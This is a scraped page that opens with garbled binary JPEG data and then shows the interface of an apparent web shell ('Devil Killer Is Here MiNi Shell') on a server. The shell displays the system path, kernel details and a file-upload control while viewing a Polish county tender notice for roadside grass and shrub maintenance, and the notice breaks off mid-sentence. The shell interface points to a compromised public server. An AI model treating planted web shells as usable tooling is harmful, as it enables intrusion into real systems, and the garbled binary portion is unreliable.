JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220221/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220221/0006299901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Utrzymanie zieleni w pasach drogowych dróg powiatowych na terenie powiatu kwidzyńskiego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kwidzyński- Starostwo Powiatowe w Kwidzynie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192644760</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 29B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kwidzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiatkwidzynski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.powiatkwidzynski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utrzymanie zieleni w pasach drogowych dróg powiatowych na terenie powiatu kwidzyńskiego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2737ca06-92eb-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00062999</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00003062/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Utrzymanie zieleni w pasach drogowych dróg powiatowych na terenie powiatu kwidzyńskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl; www.bip.powiatkwidzynski.p <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Obsługa komunikacji w formie<br/>elektronicznej pomiędzy Zamawiającym a Wykonawcami oraz składanie ofert odbywa się przy użyciu: -<br/>https://miniportal.uzp.gov.pl,<br/>-https://epuap.gov.pl/wps/portal oraz<br/>-poczty elektronicznej<br/>z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu miniPortalu, ePUAPu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Informacje ogólne.1.1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub<br/>wniosku” oraz do „Formularza do komunikacji”.1.2. Wymagania techniczne i organizacyjne wysyłania i<br/>odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń<br/>orazinformacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu<br/>miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej<br/>(ePUAP). 1.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>&#34;Formularz złożenia, zmiany, wycofania oferty lub wniosku&#34; i &#34;Formularz do komunikacji&#34; wynosi 150<br/>MB.1.4. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów<br/>elektronicznych,oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych<br/>informacji przyjmuje się datę ich przekazania na ePUAP. 1.5.Zamawiający przekazuje link do<br/>postępowania oraz ID postępowania z miniPortalu jako załącznik nr 5 do SWZ. Dane postępowanie<br/>można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję &#34;Dla<br/>Wykonawców&#34; lub ze strony głównej z zakładki Postępowania.2. Złożenie oferty.2.1. Wykonawca<br/>składa ofertę za pośrednictwem&#34;Formularza do złożenia, zmiany, wycofania oferty lub wniosku&#34;<br/>dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu do złożenia, zmiany,<br/>wycofania oferty lub wniosku Wykonawca zobowiązany jest podać numer ogłoszenia BZP (wtedy dane<br/>postepowania zaciągną się automatycznie) lub numer referencyjny (wtedy dane postępowania należy<br/>wypełnić ręcznie. UWAGA – w tym przypadku należy podawać numer IdPostępowania z miniPortalu).Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na<br/>miniPortalu, w szczegółach danego postępowania. .2.2. Ofertę należy sporządzić w języku polskim.<br/>2.3. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym<br/>prowadzona będzie korespondencja związana z postępowaniem. 2.4.Ofertę składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym. 2.5. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w<br/>&#34;Instrukcji użytkownika&#34;, dostępnej na stronie:https://miniportal.uzp.gov.pl/2.6. Jeżeli dokumenty<br/>elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje<br/>stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. a<br/>zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu utrzymania w<br/>poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z<br/>jednoczesnym zaznaczeniem polecenia &#34;Załącznik stanowiący tajemnicę przedsiębiorstwa&#34; a<br/>następnie wraz z plikami stanowiącymi jawną część należy ten plik zaszyfrować.2.7. Do oferty należy<br/>dołączyćoświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu lub<br/>kryteriów selekcji, w zakresie wskazanym w załączniku nr 5 do SWZ, w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, a<br/>następniezaszyfrować wraz z plikami stanowiącymi ofertę. 2.8. Oferta może być złożona tylko do<br/>upływu terminu składania ofert.2.9. Wykonawca może przed upływem terminu do składania ofert<br/>wycofać ofertę za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty lub wniosku&#34;<br/>dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób wycofania oferty został<br/>opisany w „Instrukcji użytkownika&#34; dostępnej na miniPortalu 2.10. Wykonawca po upływie terminu do<br/>składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.3. Pozostałe<br/>informacje znajdują się w rozdziale XVI SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja<br/>2016r., str. 1; zwanym dalej „RODO”) informujemy, że:1)administratorem Pani/Pana danych<br/>osobowych jest Starosta Powiatu Kwidzyńskiego z siedzibą w Starostwie Powiatowym w Kwidzynie o<br/>następujących danych kontaktowych: 82-500 Kwidzyn, ul. Kościuszki 29b, email:<br/>IOD@powiatkwidzynski.pl.<br/>2)administrator wyznaczył Inspektora Danych Osobowych, z którym można<br/>się kontaktować pod adresem e-mail: IOD@powiatkwidzynski.pl.3)Pani/Pana dane osobowe<br/>przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia klasycznego, prowadzonym w trybie podstawowym pn.<br/>Utrzymanie zieleni w pasach drogowych dróg powiatowych na terenie powiatu kwidzyńskiego, nr<br/>sprawy: ORIV.272.05.2022. 4) odbiorcami Pani/Pana danych osobowych będą osoby lub<br/>podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy<br/>P.Z.P. 5)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;6)obowiązek podania<br/>przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego. 7)w odniesieniu do Pani/Pana danych osobowych decyzje nie<br/>będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.8)posiada Pani/Pan:a)na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (stosownie do<br/>brzmienia przepisu art. 75 ustawy pzp- w przypadku korzystania przez osobę, której dane osobowe są<br/>przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1-3 RODO,<br/>zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia); b)na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>(stosownie do brzmienia przepisu art. 76 ustawy pzp- skorzystanie przez osobę, której dane osobowe<br/>są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o których mowa<br/>w art. 16 RODO, nie może naruszać integralności protokołu oraz jego załączników);c)na podstawie art.<br/>18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;d)prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza przepisy RODO; 9)nie przysługuje Pani/Panu: a)w związku z art. 17 ust. 3 lit. b, d<br/>lub e RODO prawo do usunięcia danych osobowych;b)prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust.<br/>1 lit. c RODO; 10)przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na<br/>niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem<br/>właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa. 11)Stosownie do brzmienia przepisu art. 19 ust. 5 ustawy pzp- Zamawiający przetwarza<br/>dane osobowe zebrane w postępowaniu o udzielenie zamówienia w sposób gwarantujący<br/>zabezpieczenie przed ich bezprawnym rozpowszechnianiem</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W nawiązaniu do powyższego obowiązku informacyjnego,<br/>a także rozdziału XXXVIII SWZ:- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana<br/>danych osobowych (stosownie do brzmienia przepisu art. 19 ust. 2 ustawy pzp- skorzystanie przez<br/>osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa<br/>w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani<br/>zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą<br/>PZP/ stosownie do brzmienia przepisu art. 76 ustawy pzp- skorzystanie przez osobę, której dane<br/>osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o<br/>których mowa w art. 16 RODO, nie może naruszać integralności protokołu oraz jego załączników);- na<br/>podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (stosownie do brzmienia przepisu<br/>art. 19 ust. 3 ustawy pzp- w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia tego postępowania nie ma zastosowania w odniesieniu do przechowywania, w<br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwa członkowskiego). Informacja obejmująca powyższy obowiązek informacyjny, a także<br/>przedmiotowe ograniczenia stosowania znajduje się również w rozdziale XXXVIII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ORIV.272.05.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest dwukrotne wykonanie w 2022 r. pielęgnacji zieleni przydrożnej<br/>wzdłuż dróg powiatowych na terenie Powiatu Kwidzyńskiego.<br/>Przedmiot zamówienia podzielony został na 2 części:<br/>CZĘŚĆ NR 1 Pielęgnacja zieleni przydrożnej w dwóch etapach na drogach o numerach dróg<br/>zgodnie z Załącznikiem A obejmuje:<br/>- przygotowanie terenu do koszenia całej szerokości pasa drogowego w tym: usunięcie<br/>odrostów, karp po usuniętych zakrzaczeniach na wysokości gruntu, kamieni, krzewów, konarów,<br/>gałęzi itp.,<br/>- mechaniczne okoszenie poboczy dróg z traw i chwastów po obu stronach jezdni z koszeniem<br/>skarp i przeciwskarp do granicy pasa drogowego,<br/>- ręczne okoszenie poboczy dróg wokół rosnących drzew wraz z wycięciem przyziemnych<br/>odrostów oraz wokół urządzeń infrastruktury, tj.: znaków drogowych, barier, przystanków<br/>komunikacji publicznej oraz wzdłuż chodników.<br/>Maksymalna wysokość traw po koszeniu - 5 cm od powierzchni gruntu.<br/>Przygotowanie terenu do koszenia można rozpocząć po podpisaniu umowy.Szczegółowy opis<br/>przedmiotu zamówienia stanowi załącznik nr 1 do SWZ<br/>3.Zamawiający dopuszcza przy realizacji zamówienia zastosowanie urządzeń i materiałów<br/>równoważnych co do jakości i surowców użytych do ich wykonania do materiałów i urządzeń<br/>podanych w dokumentach zamówienia (SWZ wraz z załącznikami).<br/>4.Jeśli w dokumentach zamówienia (SWZ wraz z załącznikami) wskazana jest nazwa handlowa<br/>firmy, towaru lub produktu, Zamawiający - w odniesieniu do wskazanych wprost w dokumentacji<br/>przetargowej parametrów, czy danych (technicznych lub jakichkolwiek innych), identyfikujących<br/>pośrednio lub bezpośrednio towar bądź produkt - dopuszcza rozwiązania równoważne zgodne z<br/>danymi technicznymi i parametrami zawartymi w w/w dokumentacji. Jako rozwiązania<br/>równoważne, należy rozumieć rozwiązania charakteryzujące się parametrami nie gorszymi od<br/>wymaganych, a znajdujących się w dokumentacji.<br/>5.Gdziekolwiek w dokumentach zamówienia (SWZ wraz z załącznikami) występują odniesienia<br/>do Polskich Norm, dopuszczalne jest stosowanie odpowiednich norm krajów Unii Europejskiej, w<br/>zakresie przyjętym przez polskie prawodawstwo.<br/>6.Wszędzie tam, gdzie dokumentach zamówienia (SWZ wraz z załącznikami), przy opisie<br/>zastosowanych materiałów lub urządzeń wskazano znaki towarowe, patenty lub pochodzenie przyjmuje się, że mogą być zastosowane materiały lub urządzenia równoważne. Wskazanie<br/>znaku towarowego, patentu lub pochodzenia ma charakter jedynie przykładowy i użyty jest w<br/>celu określenia standardów jakościowych i klasy, wymaganych w odniesieniu do stosowanych<br/>materiałów lub urządzeń. W przypadku, gdy powoływane normy i przepisy są państwowe lub<br/>odnoszą się do konkretnego kraju lub regionu, mogą być również stosowane inne odpowiednie<br/>normy zapewniające równy lub wyższy poziom wykonania niż powołane normy lub przepisy. Wymagania związane z realizacją zamówienia w zakresie zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (t.j. Dz. U. z 2020 r. poz. 1320 z późn. zm) obejmują następujące rodzaje czynności: <br/><br/>- Oznakowanie odcinka robót.<br/>- Usunięcie konarów, gałęzi, skarp po zakrzaczeniach na wysokości gruntu, kamieni, krzewów.<br/>- Mechaniczne wykaszanie roślinności.<br/>- Koszenie roślinności wykaszarkami ręcznymi.<br/>- Czyszczenia pasa jezdnego z elementów skoszonych roślin.<br/>- Demontaż oznakowania odcinka robót.<br/><br/>Szczegółowe wymagania dotyczące sposobu weryfikacji zatrudnienia tych osób oraz uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wymagań zostały określone we wzorze umowy stanowiącym odpowiednio załącznik nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77312000-0 - Usługi usuwania chwastów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">19 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu wykonania zamówienia dla I Etapu i II Etapu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ NR 2 Pielęgnacja zieleni przydrożnej w dwóch etapach na drogach o numerach dróg<br/>zgodnie z Załącznikiem B obejmuje:<br/>- mechaniczne okoszenie poboczy dróg z traw i chwastów po obu stronach jezdni na szerokość<br/>2 metrów licząc od krawędzi jezdni lub do krawędzi rowu,<br/>- ręczne okoszenie poboczy dróg: wokół rosnących drzew wraz z wycięciem przyziemnych<br/>odrostów oraz wokół urządzeń infrastruktury tj.: znaków drogowych, barier, przystanków<br/>komunikacji publicznej oraz wzdłuż chodników,<br/>- usunięcie gałęzi i konarów z poboczy<br/>- ręczne okoszenie skarp Kanału Granicznego w m. Straszewo na odcinku 50 m .<br/>Maksymalna wysokość traw po koszeniu - 5 cm od powierzchni 